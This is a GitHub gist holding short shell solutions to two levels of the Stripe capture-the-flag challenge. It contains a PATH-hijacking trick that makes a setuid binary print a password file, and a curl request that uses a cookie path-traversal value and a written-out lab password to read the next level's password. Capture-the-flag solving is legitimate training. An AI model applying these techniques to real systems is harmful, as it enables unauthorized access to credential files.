Created
February 23, 2012 18:04
-
-
Save ungood/1894064 to your computer and use it in GitHub Desktop.
stripe capture-the-flag
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| mkdir -p /tmp/ungood | |
| cd -p /tmp/ungood | |
| echo 'cat /home/level02/.password' > date | |
| chmod a+x date | |
| export PATH=/tmp/ungood:$PATH | |
| /levels/level01 |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| curl --anyauth --user level02:kxlVXUvzv --cookie user_details=../../home/level03/.password http://ctf.stri.pe/level02.php |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment